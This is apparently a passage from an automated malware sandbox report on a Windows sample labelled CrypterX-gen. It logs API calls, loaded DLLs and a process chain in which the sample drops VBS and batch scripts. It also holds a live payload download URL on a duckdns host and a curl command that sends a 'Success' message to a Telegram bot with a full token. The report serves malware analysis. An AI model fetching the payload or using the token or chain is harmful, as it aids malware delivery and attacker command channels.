Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3294244 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,wcslen, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327E6A4 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327F970 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327F0EC memset,_strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,strlen,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3299E70 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3299E60 CryptHashData, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3293D58 strlen,strlen,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3299E14 CryptAcquireContextA,CryptCreateHash, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329A438 FindClose,abort,FindFirstFileExW,GetLastError, |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329A4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AC40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AEF900 FindFirstFileExA, |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: http://decimate.online |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: http://decimate.onlinehey |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe.dlll: |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exel |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exew |
Source: curl.exe, 00000008.00000002.1533438725.000001FB15808000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs.0.dr, ping.bat.4.dr |
String found in binary or memory: https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=69151 |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/alt-svc.html |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/alt-svc.html# |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/hsts.html |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/hsts.html# |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/http-cookies.html |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/http-cookies.html# |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://ibb.co/pjHVbzL). |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: msvcp140.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: vcruntime140.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: vcruntime140_1.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: vcruntime140.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: secur32.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: dnsapi.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: rasadhlp.dll |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: fwpuclnt.dll |
Source: C:\Windows\System32\cmd.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: version.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: dxgidebug.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sfc_os.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sspicli.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: rsaenh.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: uxtheme.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: dwmapi.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: cryptbase.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: riched20.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: usp10.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: msls31.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windowscodecs.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: textshaping.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: textinputframework.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: coreuicomponents.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: coremessaging.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: ntmarta.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.storage.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wldp.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: propsys.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: profapi.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: edputil.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: urlmon.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: iertutil.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: srvcli.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: netutils.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.staterepositoryps.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: policymanager.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: msvcp110_win.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: appresolver.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: bcp47langs.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: slc.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sppc.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: userenv.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: onecorecommonproxystub.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: onecoreuapcommonproxystub.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: pcacli.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: mpr.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.fileexplorer.common.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: apphelp.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: ntshrui.dll |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: cscapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: secur32.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: iphlpapi.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: dnsapi.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: rasadhlp.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: fwpuclnt.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: schannel.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: mskeyprotect.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: ntasn1.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: ncrypt.dll |
Source: C:\Windows\System32\curl.exe |
Section loaded: ncryptsslp.dll |
Source: unknown |
Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329B2E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00007FF7B329B2E0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329B798 SetUnhandledExceptionFilter, |
0_2_00007FF7B329B798 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329B5B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00007FF7B329B5B8 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE2170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
4_2_00007FF7B0AE2170 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
4_2_00007FF7B0AE7338 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE2DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
4_2_00007FF7B0AE2DD0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE2FB4 SetUnhandledExceptionFilter, |
4_2_00007FF7B0AE2FB4 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3292524 socket,memset,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, |
0_2_00007FF7B3292524 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327BBA0 memset,strlen,memset,strlen,strncmp,strlen,strlen,strncmp,strlen,inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,memset,getsockname,WSAGetLastError,WSAGetLastError, |
0_2_00007FF7B327BBA0 |